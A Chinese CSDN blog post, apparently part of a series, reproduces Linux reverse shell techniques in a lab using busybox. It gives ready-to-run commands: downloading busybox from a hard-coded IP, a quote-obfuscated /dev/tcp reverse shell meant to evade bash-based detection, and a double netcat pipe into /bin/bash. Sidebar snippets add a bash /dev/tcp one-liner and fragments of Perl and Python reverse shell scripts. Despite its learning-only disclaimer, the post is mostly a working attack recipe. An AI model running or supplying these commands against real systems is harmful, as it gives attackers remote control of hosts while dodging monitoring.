Linux反弹shell姿势复现(二)--- 利用下载的工具执行反弹(busybox)

最新推荐文章于 2024-05-05 22:26:59 发布
最新推荐文章于 2024-05-05 22:26:59 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 安全 反弹shell linux 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44283446/article/details/115466352
版权

Linux反弹shell姿势复现(二)--- 利用下载工具执行反弹(busybox)

前言

本博文仅供学习反弹shell的姿势使用,勿作其他用途的参考!

复现环境说明

  • 服务端(被监听)(ubuntu使用cat /proc/version查看,centos使用cat /etc/system-release查看):ubuntu 5.4.0-67-generic; centos:CentOS Linux release 7.5.1804 (Core)

  • 客户端(监听):kali 5.9.0-kali1-amd64

利用下载工具执行反弹(busybox)

什么是busybox?

    busybox 是一个集成了多个最常用Linux命令和工具的软件。 在其中包含了一些简单的工具,例如ls、cat和echo,除此之外,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet等等,。因此使用busybox工具可以执行linux常用的命令。
    busybox 完整的配置过程:https://www.huaweicloud.com/zhishi/busybox.html
    本文的复现中并不需要安装完整的busybox就可以完成,但是想要安装完整版可以参考链接即可。

方法一:利用busybox执行sh

这种方式主要是利用busybox来执行sh

  1. 在监听端(kali端)开启监听:nc -nlvp 1231
    (此处假设开启的是1231端口)
    在这里插入图片描述
  2. 被监听端(centos端):
  • 远程下载busybox:wget http://139.196.91.13:7001/busybox
    使用这种方法下载的busybox没有执行权限,需要自己加上权限
  • 给busybox增加执行权限:chmod +x busybox
  • 利用busybox执行sh:./busybox sh -i >& /dev/t""cp/kali的ip地址/1231 0<&1
    此处仍然是利用了busybox来执行sh,其原理可以参考我的上一篇文章:https://blog.csdn.net/weixin_44283446/article/details/115133751
  1. kali端拿到centOs的反弹过来的shell

方法二:busybox+双nc进行反弹

利用busybox执行命令,并且结合双nc进行反弹,nc反弹也是一种常见的反弹方式,后续会起一个新的blog来总结nc反弹

  1. 在监听端(kali端)开启两个端口监听:nc -nlvp 1231 nc -nvlp 1232
    (此处假设开启的是1231、1232端口,这里我使用的是Tmux起的,关于Tmux后续我也会更一个blog来记录一下,当作是知识储备)
    在这里插入图片描述
  2. 被监听端(centOs端)
  • 远程下载busybox:wget http://139.196.91.13:7001/busybox
  • 同方法一,给busybox增加执行权限:chmod +x busybox
  • 执行命令:
    ./busybox sh
    nc kali的ip地址 1231 | /bin/bash | nc kali的ip地址 1232
  1. kali端拿到centOs的反弹过来的shell

    以上是关于利用利用下载的工具busybox执行反弹部分方法的总结,其原理也就是利用busybox来执行linux的命令来躲避bash,该系列主要针对于linux,如果后续能做到Windows,会将Windows下的反弹shell也做一个总结,其包含了Powershell反弹、利用脚本反弹等等。
    本文如有不足之处,欢迎指正(* ̄︶ ̄)

Linux反弹Shell检出原理篇
SHELLCODE_8BIT的博客
03-24 3153
1.理解什么是tty,pty,pts tty是终端,pty为终端,pts是pty实现,参考下文 Linux下的tty和pts详解_大蓝的信安日记的博客-CSDN博客 2.了解基本反弹shell原理是stdin stdout stderr重定向 0 标准输入 1 标准输入 2 标准错误 https://xz.aliyun.com/t/2548 3.反弹shell有各种类型,然后不同类型有不同特诊,将其分类并且检出 bash反弹shell攻击检测 - micr067 - 博客园 ...
反弹Shell测试脚本
SHELLCODE_8BIT的博客
06-20 542
使用下列脚本可以测试反弹Shell
使用wget下载需要用户名和密码访问的网站资源
core5277的专栏
03-24 3631
wget是在Linux下开发的开放源代码的软件,作者是Hrvoje Niksic,后来被移植到包括Windows在内的各个平台上。它有以下功能和特点:   (1)支持断点下传功能;这一点,也是网络蚂蚁和FlashGet当年最大的卖点,现在,Wget也可以使用此功能,那些网络不是太好的用户可以放心了;   (2)同时支持FTP和HTTP下载方式;尽管现在大部分软件可以使用HTTP方式下载...
反弹shell
qq_59607911的博客
10-17 216
一,windows反弹shell执行powershell脚本需要修改powershell权限:命令执行设置powershell权限:四种权限:1、Restricted: 默认设置,不允许执行任何脚本2、Allsigned:只能运行经过证书验证的脚本3、Unrestricted: 权限最高,可以执行任意脚本4、RemoteSigned: 对本地脚本不进行限制;对来自网络的脚本必须验证其签名。
linux 反弹脚本,linux 下反弹SHELL
weixin_39902107的博客
04-30 173
linux反弹SHELL()#!/usr/bin/perl-w#usestrict;useSocket;useI:Handle;if($#ARGV+1 !=2){print "$#ARGV $0 Remote_IP Remote_Port\n";exit 1;}my $remote_ip =$ARGV[0];my $remote_port =$ARGV[1];my $...
常用的反弹shell脚本
weixin_30606461的博客
12-07 158
bash shell反弹脚本 /bin/bash -i > /dev/tcp/10.211.55.11/443 0<&1 2>&1 Python shell 反弹脚本 #!/usr/bin/python # This is a Python reverse shell script import socket,subprocess,...
busybox.sh
09-08
该脚本用于freescale i.mx6平台使用buildroot编译x11vnc时,设置库文件路径
Busybox不用回车直接进入shell
yclz的专栏
03-06 1311
在init/init.c里的run函数中将if (a->action & ASKFIRST) { char c; messageD(LOG, "Waiting for enter to start %s" "(pid %d, terminal %s)/n", cmdpath, getpid(), a->terminal); bb_full_write(1, press_enter, siz
BusyBox工具
wj193165zl的博客
08-13 1436
busybox使静态编译的,不依赖于系统的动态链接库,从而不受ld.so.preload的劫持,能够正常操作文件。 系统在执行程序的时候,会通过环境变量LD_PRELOAD和配置文件/etc/ld.so.preload进行预加载从而调用动态链接库,如果这两者被修改的话,那么系统程序在执行的时候,就会调用这两者被修改的内容。 busybox安装方式: cd /bin/ wget https:...
反弹shell的命令大全
G3et的博客
03-21 1024
【代码】反弹shell的命令大全。
Android安装BusyBox(使用vi,wget,...)
哈哈的狮子
10-24 614
BusyBox 是标准 Linux 工具的一个单个可执行实现。BusyBox 包含了一些简单的工具,例如 cat 和 echo,还包含了一些更大、更复杂的工具,例如 grep、find、mount 以及 telnet。有些人将 BusyBox 称为 Linux 工具里的瑞士军刀.简单的说BusyBox就好像是个大工具箱,它集成压缩了 Linux 的许多工具和命令。(摘自百度百科)
busybox 1.16.1中的wget命令中-t -T参数均未实现,看了源码才知道,太坑爹了。
Season@HangZhou 专栏
01-04 5870
busybox 1.16.1中的wget命令中-t -T参数均未实现,看了源码才知道,太坑爹了。就算是下了最新的busybox1.20.2,“-t”参数也是还未实现的。用的人注意啊。
BusyBox找不到sh的解决方法
weixin_34226706的博客
03-26 881
这几天一直在看《嵌入式软件开发及C语言实现——MiniGUI剖析》自学嵌入式LINUX,在编译完busybox-1.1.3,做好文件系统映像后,放到skyeye运行,却碰到这样的问题:Bummer, could not run '/bin/sh': No such file or directoryNNDX啊,本着我多年的网络搜索大法开始寻求解决方法。翻了N多博客和论坛后,重...
Android之adb安装busybox使用wget、telnet等服务
qq_46269365的博客
04-11 8570
Android中通过在ADB中安装busybox使用wget、telnet等服务
Linux反弹shell姿势复现(一)--- 利用bash反弹shell
weixin_44283446的博客
03-23 4219
反弹shell姿势复现(一)前言复现环境说明反弹shell姿势(一)--- 利用bash反弹shell重要说明方法一方法 前言     反弹shell有很多种方式,这个系列内容较多,之后也会不断更新,对于反弹shell复现也算是一个近期工作的归纳总结吧。     注意:本博文仅供学习反弹shell姿势使用,勿作其他用途的参考! 复现环境说明 我在ubuntu和centos上均做了复现,用于比较版本对反弹shell的影响
busybox的sh中循环计数
David_xtd的专栏
11-15 6820
问题: 目标板使用rt5350芯片,在目标板的shell脚本中要实现计数功能,但是不能使用declare -i idx和let语句。 解决办法: 1. 考虑使用expr运算符来计算。 #!/bin/sh idx=0 List="1 2 3" ### while [ $idx -lt 5 ] for j in $List do #here do something if
刚进入Android终端即可使用busybox的命令
runfeel
11-19 206
刚进入Android终端即可使用busybox的命令 作者:dengxiayehu 欢迎交流,转载请注出处。 Android中的内置sh可是出了名的难用,只支持少得可怜的常用命令,所以大家一般都喜欢推一个busybox进去 以方便使用。具体方法请参见:在Android模拟器中安装busybox这篇文章。 但是这里又出现一个问题就是,就是我们每次adb shell进入Android的终端后...
为Android安装BusyBox —— 完整的bash shell
just thinking
04-22 416
http://www.189works.com/article-13635-1.html 大家是否有过这样的经历,在命令行里输入adb shell,然后使用命令操作你的手机或模拟器,但是那些命令都是常见Linux命令的阉割缩水版,用起来很不爽。是否想过在Android上使用较完整的shell呢?用BusyBox吧。不论使用adb连接设备使用命令行还是在手机上直接用terminal emula
busybox记录】【shell指令】b2sum
最新发布
44083579的博客
05-05 889
b2sum指令用法
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值